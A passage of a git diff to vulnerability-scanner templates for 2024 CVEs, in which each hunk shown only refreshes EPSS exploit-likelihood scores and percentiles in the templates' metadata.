a/http/cves/2024/CVE-2024-33113.yaml +++ b/http/cves/2024/CVE-2024-33113.yaml @@ -15,7 +15,7 @@ info: - https://github.com/yj94/Yj_learning/blob/main/Week16/D-LINK-POC.md classification: epss-score: 0.52857 - epss-percentile: 0.97857 + epss-percentile: 0.97853 cpe: cpe:2.3:h:dlink:dir-845l:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-33326.yaml b/http/cves/2024/CVE-2024-33326.yaml index 8c5f0fcae77..b5ade7e7fd5 100644 --- a/http/cves/2024/CVE-2024-33326.yaml +++ b/http/cves/2024/CVE-2024-33326.yaml @@ -19,7 +19,7 @@ info: cvss-score: 5.4 cve-id: CVE-2024-33326 epss-score: 0.097 - epss-percentile: 0.92685 + epss-percentile: 0.92679 cwe-id: CWE-79 cpe: cpe:2.3:a:lumis:lumis_experience_platform:*:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2024/CVE-2024-33575.yaml b/http/cves/2024/CVE-2024-33575.yaml index 6a538c65de0..e6fff533307 100644 --- a/http/cves/2024/CVE-2024-33575.yaml +++ b/http/cves/2024/CVE-2024-33575.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2024-33575 cwe-id: CWE-200 epss-score: 0.05404 - epss-percentile: 0.8985 + epss-percentile: 0.89845 metadata: max-request: 1 vendor: "User Meta" diff --git a/http/cves/2024/CVE-2024-33605.yaml b/http/cves/2024/CVE-2024-33605.yaml index 4fb374f0852..f9dd8e57794 100644 --- a/http/cves/2024/CVE-2024-33605.yaml +++ b/http/cves/2024/CVE-2024-33605.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2024-33605 cwe-id: CWE-22 epss-score: 0.51432 - epss-percentile: 0.97793 + epss-percentile: 0.97789 cpe: cpe:2.3:o:sharp:mx-3550v_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-33610.yaml b/http/cves/2024/CVE-2024-33610.yaml index da8599ff5ef..cb6cad46d34 100644 --- a/http/cves/2024/CVE-2024-33610.yaml +++ b/http/cves/2024/CVE-2024-33610.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-33610 cwe-id: CWE-284 epss-score: 0.59525 - epss-percentile: 0.98173 + epss-percentile: 0.98175 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-33939.yaml b/http/cves/2024/CVE-2024-33939.yaml index d78628977fb..e91b6c1590b 100644 --- a/http/cves/2024/CVE-2024-33939.yaml +++ b/http/cves/2024/CVE-2024-33939.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5.3 cve-id: CVE-2024-33939 cwe-id: CWE-288 - epss-score: 0.02581 - epss-percentile: 0.85167 + epss-score: 0.0203 + epss-percentile: 0.83346 cpe: cpe:2.3:a:themegrill:masteriyo:*:*:*:*:free:wordpress:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-3400.yaml b/http/cves/2024/CVE-2024-3400.yaml index 16f006e77d6..52938b1cb18 100644 --- a/http/cves/2024/CVE-2024-3400.yaml +++ b/http/cves/2024/CVE-2024-3400.yaml @@ -21,8 +21,8 @@ info: cvss-score: 10 cve-id: CVE-2024-3400 cwe-id: CWE-20,CWE-77 - epss-score: 0.94297 - epss-percentile: 0.99939 + epss-score: 0.94321 + epss-percentile: 0.99947 cpe: cpe:2.3:o:paloaltonetworks:pan-os:10.2.0:-:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-34061.yaml b/http/cves/2024/CVE-2024-34061.yaml index 36a0ed15f75..e7c9c560e4e 100644 --- a/http/cves/2024/CVE-2024-34061.yaml +++ b/http/cves/2024/CVE-2024-34061.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-34061 cwe-id: CWE-79 epss-score: 0.2769 - epss-percentile: 0.96291 + epss-percentile: 0.96294 metadata: verified: true max-request: 2 diff --git a/http/cves/2024/CVE-2024-34257.yaml b/http/cves/2024/CVE-2024-34257.yaml index 89a6c8b2a9d..8a28a597762 100644 --- a/http/cves/2024/CVE-2024-34257.yaml +++ b/http/cves/2024/CVE-2024-34257.yaml @@ -16,7 +16,7 @@ info: - https://github.com/20142995/nuclei-templates classification: epss-score: 0.89615 - epss-percentile: 0.99536 + epss-percentile: 0.99538 metadata: vendor: totolink product: a3700r_firmware diff --git a/http/cves/2024/CVE-2024-3469.yaml b/http/cves/2024/CVE-2024-3469.yaml index dc0b031679b..1b8cbcee4ed 100644 --- a/http/cves/2024/CVE-2024-3469.yaml +++ b/http/cves/2024/CVE-2024-3469.yaml @@ -16,8 +16,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2024-3469 - epss-score: 0.13807 - epss-percentile: 0.94076 + epss-score: 0.136 + epss-percentile: 0.9402 cwe-id: CWE-79 metadata: verified: true diff --git a/http/cves/2024/CVE-2024-34982.yaml b/http/cves/2024/CVE-2024-34982.yaml index d78f8fcb93b..6b170c997bd 100644 --- a/http/cves/2024/CVE-2024-34982.yaml +++ b/http/cves/2024/CVE-2024-34982.yaml @@ -16,7 +16,7 @@ info: - https://github.com/ATonysan/poc-exp/blob/main/60NavigationPage_CVE-2024-34982_ArbitraryFileUploads.py classification: epss-score: 0.7835 - epss-percentile: 0.98982 + epss-percentile: 0.98981 cpe: cpe:2.3:a:lylme:lylme_spage:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-35219.yaml b/http/cves/2024/CVE-2024-35219.yaml index db11ea76fb4..0f2b534464d 100644 --- a/http/cves/2024/CVE-2024-35219.yaml +++ b/http/cves/2024/CVE-2024-35219.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.3 cve-id: CVE-2024-35219 cwe-id: CWE-22 - epss-score: 0.39262 - epss-percentile: 0.9716 + epss-score: 0.5521 + epss-percentile: 0.97975 metadata: max-request: 2 verified: true diff --git a/http/cves/2024/CVE-2024-3552.yaml b/http/cves/2024/CVE-2024-3552.yaml index 6a6ab1a5bbc..80a8646bf3e 100644 --- a/http/cves/2024/CVE-2024-3552.yaml +++ b/http/cves/2024/CVE-2024-3552.yaml @@ -15,7 +15,7 @@ info: - https://wpscan.com/vulnerability/34b03ee4-de81-4fec-9f3d-e1bd5b94d136/ classification: epss-score: 0.93576 - epss-percentile: 0.99821 + epss-percentile: 0.99823 cpe: cpe:2.3:a:salephpscripts:web_directory_free:*:*:*:*:wordpress:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-35693.yaml b/http/cves/2024/CVE-2024-35693.yaml index d9725862e26..22af74877bd 100644 --- a/http/cves/2024/CVE-2024-35693.yaml +++ b/http/cves/2024/CVE-2024-35693.yaml @@ -19,8 +19,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2024-35693 - epss-score: 0.07872 - epss-percentile: 0.91754 + epss-score: 0.07331 + epss-percentile: 0.91431 cwe-id: CWE-79 cpe: cpe:2.3:a:code4recovery:12_step_meeting_list:*:*:*:*:*:wordpress:*:* metadata: diff --git a/http/cves/2024/CVE-2024-35694.yaml b/http/cves/2024/CVE-2024-35694.yaml index 49b5cad69ee..ef1c2e14a90 100644 --- a/http/cves/2024/CVE-2024-35694.yaml +++ b/http/cves/2024/CVE-2024-35694.yaml @@ -12,8 +12,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L cvss-score: 7.1 cve-id: CVE-2024-35694 - epss-score: 0.06473 - epss-percentile: 0.90793 + epss-score: 0.07202 + epss-percentile: 0.91337 cwe-id: CWE-79 cpe: cpe:2.3:a:amauri:wpmobile.app::::::wordpress::* metadata: diff --git a/http/cves/2024/CVE-2024-36675.yaml b/http/cves/2024/CVE-2024-36675.yaml index bdb4e709e97..c3a41109ade 100644 --- a/http/cves/2024/CVE-2024-36675.yaml +++ b/http/cves/2024/CVE-2024-36675.yaml @@ -15,7 +15,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2024-36675 classification: epss-score: 0.44282 - epss-percentile: 0.97439 + epss-percentile: 0.97436 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N cvss-score: 9.1 cve-id: CVE-2024-36675 diff --git a/http/cves/2024/CVE-2024-36683.yaml b/http/cves/2024/CVE-2024-36683.yaml index 4cb3bff9c1e..fda2dc3f1ac 100644 --- a/http/cves/2024/CVE-2024-36683.yaml +++ b/http/cves/2024/CVE-2024-36683.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2024-36683 cwe-id: CWE-89 - epss-score: 0.00735 - epss-percentile: 0.7232 + epss-score: 0.00996 + epss-percentile: 0.76469 metadata: verified: true max-request: 2 diff --git a/http/cves/2024/CVE-2024-36837.yaml b/http/cves/2024/CVE-2024-36837.yaml index 7924153ef38..420122f78c5 100644 --- a/http/cves/2024/CVE-2024-36837.yaml +++ b/http/cves/2024/CVE-2024-36837.yaml @@ -15,7 +15,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2024-36837 classification: epss-score: 0.92213 - epss-percentile: 0.99704 + epss-percentile: 0.99703 cpe: cpe:2.3:a:crmeb:crmeb:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-36857.yaml b/http/cves/2024/CVE-2024-36857.yaml index c8c572f09fc..713caccc5b6 100644 --- a/http/cves/2024/CVE-2024-36857.yaml +++ b/http/cves/2024/CVE-2024-36857.yaml @@ -18,7 +18,7 @@ info: cvss-score: 7.5 cve-id: CVE-2024-36857 epss-score: 0.55135 - epss-percentile: 0.97974 + epss-percentile: 0.97971 cpe: cpe:2.3:a:homebrew:jan:0.4.12:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-3742.yaml b/http/cves/2024/CVE-2024-3742.yaml index 2213ba0dfd7..39468fb6bfb 100644 --- a/http/cves/2024/CVE-2024-3742.yaml +++ b/http/cves/2024/CVE-2024-3742.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2024-3742 cwe-id: CWE-312 epss-score: 0.10226 - epss-percentile: 0.92924 + epss-percentile: 0.92917 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-3753.yaml b/http/cves/2024/CVE-2024-3753.yaml index 5abcc1ca028..e234766d33b 100644 --- a/http/cves/2024/CVE-2024-3753.yaml +++ b/http/cves/2024/CVE-2024-3753.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-3753 cwe-id: CWE-79 epss-score: 0.01082 - epss-percentile: 0.77409 + epss-percentile: 0.77403 cpe: cpe:2.3:a:kibokolabs:hostel:*:*:*:*:wordpress:*:*:* metadata: max-request: 3 diff --git a/http/cves/2024/CVE-2024-37656.yaml b/http/cves/2024/CVE-2024-37656.yaml index d7cc8103d0e..3ac67e8065a 100644 --- a/http/cves/2024/CVE-2024-37656.yaml +++ b/http/cves/2024/CVE-2024-37656.yaml @@ -18,7 +18,7 @@ info: cvss-score: 6.1 cve-id: CVE-2024-37656 epss-score: 0.00126 - epss-percentile: 0.32588 + epss-percentile: 0.3253 cwe-id: CWE-601 cpe: cpe:2.3:a:sir:gnuboard:5.5.16:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2024/CVE-2024-37728.yaml b/http/cves/2024/CVE-2024-37728.yaml index 9732aecab20..2dff74b2044 100644 --- a/http/cves/2024/CVE-2024-37728.yaml +++ b/http/cves/2024/CVE-2024-37728.yaml @@ -18,7 +18,7 @@ info: cvss-score: 7.5 cve-id: CVE-2024-37728 epss-score: 0.10368 - epss-percentile: 0.92985 + epss-percentile: 0.92978 cwe-id: CWE-22 metadata: verified: true diff --git a/http/cves/2024/CVE-2024-37881.yaml b/http/cves/2024/CVE-2024-37881.yaml index c7535de99a2..c751f7d0b20 100644 --- a/http/cves/2024/CVE-2024-37881.yaml +++ b/http/cves/2024/CVE-2024-37881.yaml @@ -17,7 +17,7 @@ info: - https://www.usom.gov.tr/bildirim/tr-24-0726 classification: epss-score: 0.05198 - epss-percentile: 0.89611 + epss-percentile: 0.89607 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-3822.yaml b/http/cves/2024/CVE-2024-3822.yaml index 7e2ecb1cd06..615e61ad52a 100644 --- a/http/cves/2024/CVE-2024-3822.yaml +++ b/http/cves/2024/CVE-2024-3822.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2024-3822 cwe-id: CWE-79 epss-score: 0.00508 - epss-percentile: 0.65697 + epss-percentile: 0.65679 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-38288.yaml b/http/cves/2024/CVE-2024-38288.yaml index 9b405092a0d..5c48eca6416 100644 --- a/http/cves/2024/CVE-2024-38288.yaml +++ b/http/cves/2024/CVE-2024-38288.yaml @@ -15,7 +15,7 @@ info: - https://www.rhubcom.com/v5/manuals.html classification: epss-score: 0.68544 - epss-percentile: 0.98555 + epss-percentile: 0.98558 cpe: cpe:2.3:a:rhubcom:turbomeeting:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-38353.yaml b/http/cves/2024/CVE-2024-38353.yaml index f8902a71244..b7fb84d7839 100644 --- a/http/cves/2024/CVE-2024-38353.yaml +++ b/http/cves/2024/CVE-2024-38353.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2024-38353 cwe-id: CWE-338 epss-score: 0.05317 - epss-percentile: 0.89736 + epss-percentile: 0.89732 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-38472.yaml b/http/cves/2024/CVE-2024-38472.yaml index 4b7756fbd00..22d56f650e9 100644 --- a/http/cves/2024/CVE-2024-38472.yaml +++ b/http/cves/2024/CVE-2024-38472.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2024-38472 cwe-id: CWE-918 epss-score: 0.90493 - epss-percentile: 0.99589 + epss-percentile: 0.99587 tags: cve,cve2024,apache,ssrf,oast,httpd,vuln http: diff --git a/http/cves/2024/CVE-2024-3848.yaml b/http/cves/2024/CVE-2024-3848.yaml index 8833c12e4f9..ccd900a8f82 100644 --- a/http/cves/2024/CVE-2024-3848.yaml +++ b/http/cves/2024/CVE-2024-3848.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2024-3848 cwe-id: CWE-29 - epss-score: 0.73811 - epss-percentile: 0.98772 + epss-score: 0.79522 + epss-percentile: 0.99042 cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-3850.yaml b/http/cves/2024/CVE-2024-3850.yaml index 68da2f84fe1..4c59cc3e510 100644 --- a/http/cves/2024/CVE-2024-3850.yaml +++ b/http/cves/2024/CVE-2024-3850.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-3850 cwe-id: CWE-79 epss-score: 0.11904 - epss-percentile: 0.93532 + epss-percentile: 0.93525 cpe: cpe:2.3:h:uniview:nvr301-04s2-p4:-:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-39646.yaml b/http/cves/2024/CVE-2024-39646.yaml index beaa410ef19..c99b77e57f5 100644 --- a/http/cves/2024/CVE-2024-39646.yaml +++ b/http/cves/2024/CVE-2024-39646.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2024-39646 cwe-id: CWE-79 epss-score: 0.06273 - epss-percentile: 0.9064 + epss-percentile: 0.90641 cpe: cpe:2.3:a:kunalnagar:custom_404_pro:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-39887.yaml b/http/cves/2024/CVE-2024-39887.yaml index 16d4004e2b8..904c792a26b 100644 --- a/http/cves/2024/CVE-2024-39887.yaml +++ b/http/cves/2024/CVE-2024-39887.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2024-39887 cwe-id: CWE-89 epss-score: 0.53758 - epss-percentile: 0.9791 + epss-percentile: 0.97907 metadata: verified: true max-request: 3 diff --git a/http/cves/2024/CVE-2024-39903.yaml b/http/cves/2024/CVE-2024-39903.yaml index 606a3327dce..a6e8455b1b5 100644 --- a/http/cves/2024/CVE-2024-39903.yaml +++ b/http/cves/2024/CVE-2024-39903.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2024-39903 cwe-id: CWE-22 epss-score: 0.45768 - epss-percentile: 0.97516 + epss-percentile: 0.97511 metadata: fofa-query: icon_hash="-223126228" verified: true diff --git a/http/cves/2024/CVE-2024-39907.yaml b/http/cves/2024/CVE-2024-39907.yaml index c3ad0a25f62..02f2bbd6e19 100644 --- a/http/cves/2024/CVE-2024-39907.yaml +++ b/http/cves/2024/CVE-2024-39907.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2024-39907 cwe-id: CWE-89 epss-score: 0.84705 - epss-percentile: 0.99304 + epss-percentile: 0.99302 cpe: cpe:2.3:a:fit2cloud:1panel:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-39914.yaml b/http/cves/2024/CVE-2024-39914.yaml index a99e6922fd2..f513dc890a1 100644 --- a/http/cves/2024/CVE-2024-39914.yaml +++ b/http/cves/2024/CVE-2024-39914.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2024-39914 cwe-id: CWE-77 epss-score: 0.93559 - epss-percentile: 0.99819 + epss-percentile: 0.99821 metadata: vendor: fogproject product: fogproject diff --git a/http/cves/2024/CVE-2024-40348.yaml b/http/cves/2024/CVE-2024-40348.yaml index 162e58656bf..72ea3673c7c 100644 --- a/http/cves/2024/CVE-2024-40348.yaml +++ b/http/cves/2024/CVE-2024-40348.yaml @@ -16,7 +16,7 @@ info: - https://github.com/bigb0x/CVE-2024-40348 classification: epss-score: 0.92526 - epss-percentile: 0.99726 + epss-percentile: 0.99725 metadata: verified: true max-request: 2 diff --git a/http/cves/2024/CVE-2024-40711.yaml b/http/cves/2024/CVE-2024-40711.yaml index 100c2c3c1e4..0ccd09563fd 100644 --- a/http/cves/2024/CVE-2024-40711.yaml +++ b/http/cves/2024/CVE-2024-40711.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2024-40711 cwe-id: CWE-502 - epss-score: 0.68197 - epss-percentile: 0.98538 + epss-score: 0.6393 + epss-percentile: 0.98363 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-41667.yaml b/http/cves/2024/CVE-2024-41667.yaml index c38b9a275e8..4cdd0ebb380 100644 --- a/http/cves/2024/CVE-2024-41667.yaml +++ b/http/cves/2024/CVE-2024-41667.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2024-41667 cwe-id: CWE-94 epss-score: 0.69856 - epss-percentile: 0.98613 + epss-percentile: 0.98614 metadata: max-request: 12 verified: true diff --git a/http/cves/2024/CVE-2024-4180.yaml b/http/cves/2024/CVE-2024-4180.yaml index 2127b73bcc7..3a6bd37a181 100644 --- a/http/cves/2024/CVE-2024-4180.yaml +++ b/http/cves/2024/CVE-2024-4180.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2024-4180 cwe-id: CWE-79 epss-score: 0.32944 - epss-percentile: 0.96751 + epss-percentile: 0.96752 cpe: cpe:2.3:a:stellarwp:the_events_calendar:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-41810.yaml b/http/cves/2024/CVE-2024-41810.yaml index 9ac406d9c3d..5a7705bbe2f 100644 --- a/http/cves/2024/CVE-2024-41810.yaml +++ b/http/cves/2024/CVE-2024-41810.yaml @@ -15,7 +15,7 @@ info: cvss-score: 6.1 cve-id: CVE-2024-41810 epss-score: 0.68165 - epss-percentile: 0.98538 + epss-percentile: 0.9854 cpe: cpe:2.3:a:twistedmatrix:twisted:*:*:*:*:*:*:*:* reference: - https://github.com/advisories/GHSA-cf56-g6w6-pqq2 diff --git a/http/cves/2024/CVE-2024-41955.yaml b/http/cves/2024/CVE-2024-41955.yaml index afd480a33c5..d5f82797003 100644 --- a/http/cves/2024/CVE-2024-41955.yaml +++ b/http/cves/2024/CVE-2024-41955.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2024-41955 cwe-id: CWE-601 epss-score: 0.14899 - epss-percentile: 0.94331 + epss-percentile: 0.94327 metadata: max-request: 1 verified: true diff --git a/http/cves/2024/CVE-2024-42009.yaml b/http/cves/2024/CVE-2024-42009.yaml index 36f8a75e3fe..6dfbf876491 100644 --- a/http/cves/2024/CVE-2024-42009.yaml +++ b/http/cves/2024/CVE-2024-42009.yaml @@ -18,8 +18,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N cvss-score: 9.3 cve-id: CVE-2024-42009 - epss-score: 0.90439 - epss-percentile: 0.99585 + epss-score: 0.91224 + epss-percentile: 0.9963 cwe-id: CWE-79 cpe: cpe:2.3:a:roundcube:webmail:*:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2024/CVE-2024-4257.yaml b/http/cves/2024/CVE-2024-4257.yaml index 0e0d9ad72c1..5d380af314d 100644 --- a/http/cves/2024/CVE-2024-4257.yaml +++ b/http/cves/2024/CVE-2024-4257.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2024-4257 cwe-id: CWE-89 epss-score: 0.9213 - epss-percentile: 0.99694 + epss-percentile: 0.99693 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-42852.yaml b/http/cves/2024/CVE-2024-42852.yaml index 7539b80b3aa..70a2e142d58 100644 --- a/http/cves/2024/CVE-2024-42852.yaml +++ b/http/cves/2024/CVE-2024-42852.yaml @@ -15,7 +15,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2024-42852 classification: epss-score: 0.02711 - epss-percentile: 0.85504 + epss-percentile: 0.85501 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2024-42852 diff --git a/http/cves/2024/CVE-2024-43160.yaml b/http/cves/2024/CVE-2024-43160.yaml index c3f912bda46..81284069ff2 100644 --- a/http/cves/2024/CVE-2024-43160.yaml +++ b/http/cves/2024/CVE-2024-43160.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2024-43160 cwe-id: CWE-434 epss-score: 0.83713 - epss-percentile: 0.99263 + epss-percentile: 0.99265 metadata: verified: true max-request: 3 diff --git a/http/cves/2024/CVE-2024-4325.yaml b/http/cves/2024/CVE-2024-4325.yaml index 54ea78440c1..caf862476a0 100644 --- a/http/cves/2024/CVE-2024-4325.yaml +++ b/http/cves/2024/CVE-2024-4325.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-4325 cwe-id: CWE-918 epss-score: 0.4767 - epss-percentile: 0.9761 + epss-percentile: 0.97604 cpe: cpe:2.3:a:gradio_project:gradio:*:*:*:*:*:python:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-4348.yaml b/http/cves/2024/CVE-2024-4348.yaml index c9ded6fbc94..2ec5fb5677a 100644 --- a/http/cves/2024/CVE-2024-4348.yaml +++ b/http/cves/2024/CVE-2024-4348.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2024-4348 cwe-id: CWE-79 epss-score: 0.15602 - epss-percentile: 0.94478 + epss-percentile: 0.94476 cpe: cpe:2.3:a:oscommerce:oscommerce:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-4358.yaml b/http/cves/2024/CVE-2024-4358.yaml index 0cc4f2198a1..cb6ec3a9b4b 100644 --- a/http/cves/2024/CVE-2024-4358.yaml +++ b/http/cves/2024/CVE-2024-4358.yaml @@ -14,7 +14,7 @@ info: - https://docs.telerik.com/report-server/knowledge-base/registration-auth-bypass-cve-2024-4358 classification: epss-score: 0.94344 - epss-percentile: 0.99952 + epss-percentile: 0.99953 cpe: cpe:2.3:a:progress:telerik_report_server:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-43917.yaml b/http/cves/2024/CVE-2024-43917.yaml index a7e3b5b7ff1..2bb52dd00bd 100644 --- a/http/cves/2024/CVE-2024-43917.yaml +++ b/http/cves/2024/CVE-2024-43917.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2024-43917 cwe-id: CWE-89 - epss-score: 0.88274 - epss-percentile: 0.99469 + epss-score: 0.89478 + epss-percentile: 0.99532 cpe: cpe:2.3:a:templateinvaders:ti_woocommerce_wishlist:*:*:*:*:free:wordpress:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-43971.yaml b/http/cves/2024/CVE-2024-43971.yaml index 316eebd645d..1780c64d9f6 100644 --- a/http/cves/2024/CVE-2024-43971.yaml +++ b/http/cves/2024/CVE-2024-43971.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2024-43971 - epss-score: 0.05895 - epss-percentile: 0.90315 + epss-score: 0.05616 + epss-percentile: 0.90063 cwe-id: CWE-79 metadata: verified: true diff --git a/http/cves/2024/CVE-2024-44349.yaml b/http/cves/2024/CVE-2024-44349.yaml index 9cae6723aa0..f280b4b7154 100644 --- a/http/cves/2024/CVE-2024-44349.yaml +++ b/http/cves/2024/CVE-2024-44349.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-44349 cwe-id: CWE-89 epss-score: 0.6931 - epss-percentile: 0.98591 + epss-percentile: 0.98592 metadata: verified: true max-request: 2 diff --git a/http/cves/2024/CVE-2024-4439.yaml b/http/cves/2024/CVE-2024-4439.yaml index b651d1aafad..e03223b61ad 100644 --- a/http/cves/2024/CVE-2024-4439.yaml +++ b/http/cves/2024/CVE-2024-4439.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-4439 cwe-id: CWE-80 epss-score: 0.92065 - epss-percentile: 0.99689 + epss-percentile: 0.99688 metadata: max-request: 10 framework: wordpress diff --git a/http/cves/2024/CVE-2024-4455.yaml b/http/cves/2024/CVE-2024-4455.yaml index b3de4ad184e..08521e98831 100644 --- a/http/cves/2024/CVE-2024-4455.yaml +++ b/http/cves/2024/CVE-2024-4455.yaml @@ -18,8 +18,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cve-id: CVE-2024-4455 - epss-score: 0.07954 - epss-percentile: 0.91804 + epss-score: 0.06671 + epss-percentile: 0.90957 cwe-id: CWE-79 metadata: verified: true diff --git a/http/cves/2024/CVE-2024-44762.yaml b/http/cves/2024/CVE-2024-44762.yaml index d1332d998ea..297357c250b 100644 --- a/http/cves/2024/CVE-2024-44762.yaml +++ b/http/cves/2024/CVE-2024-44762.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2024-44762 cwe-id: CWE-209 epss-score: 0.11579 - epss-percentile: 0.9343 + epss-percentile: 0.93424 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-44849.yaml b/http/cves/2024/CVE-2024-44849.yaml index 2ce476854c0..f8d3f28d745 100644 --- a/http/cves/2024/CVE-2024-44849.yaml +++ b/http/cves/2024/CVE-2024-44849.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2024-44849 cwe-id: CWE-434 - epss-score: 0.92073 - epss-percentile: 0.9969 + epss-score: 0.91917 + epss-percentile: 0.99677 metadata: verified: true max-request: 2 diff --git a/http/cves/2024/CVE-2024-45216.yaml b/http/cves/2024/CVE-2024-45216.yaml index 12f8b1dfda4..9eac41e50c0 100644 --- a/http/cves/2024/CVE-2024-45216.yaml +++ b/http/cves/2024/CVE-2024-45216.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2024-45216 cwe-id: CWE-863,CWE-287 epss-score: 0.9408 - epss-percentile: 0.99899 + epss-percentile: 0.99898 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-45241.yaml b/http/cves/2024/CVE-2024-45241.yaml index fcc3438d3ce..fa9bd487e53 100644 --- a/http/cves/2024/CVE-2024-45241.yaml +++ b/http/cves/2024/CVE-2024-45241.yaml @@ -19,7 +19,7 @@ info: cvss-score: 7.5 cve-id: CVE-2024-45241 epss-score: 0.90658 - epss-percentile: 0.99597 + epss-percentile: 0.99596 cpe: cpe:2.3:a:centralsquare:crywolf:2024-08-09:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-45293.yaml b/http/cves/2024/CVE-2024-45293.yaml index c865f5f53e1..de9f113fc9b 100644 --- a/http/cves/2024/CVE-2024-45293.yaml +++ b/http/cves/2024/CVE-2024-45293.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2024-45293 cwe-id: CWE-611 epss-score: 0.65316 - epss-percentile: 0.98421 + epss-percentile: 0.98423 cpe: cpe:2.3:a:tablepress:tablepress:*:*:*:*:*:wordpress:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-45309.yaml b/http/cves/2024/CVE-2024-45309.yaml index 5f1a62b0ab5..ba20bdb8f63 100644 --- a/http/cves/2024/CVE-2024-45309.yaml +++ b/http/cves/2024/CVE-2024-45309.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2024-45309 cwe-id: CWE-22 epss-score: 0.87249 - epss-percentile: 0.99424 + epss-percentile: 0.99426 cpe: cpe:2.3:a:onedev_project:onedev:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-45388.yaml 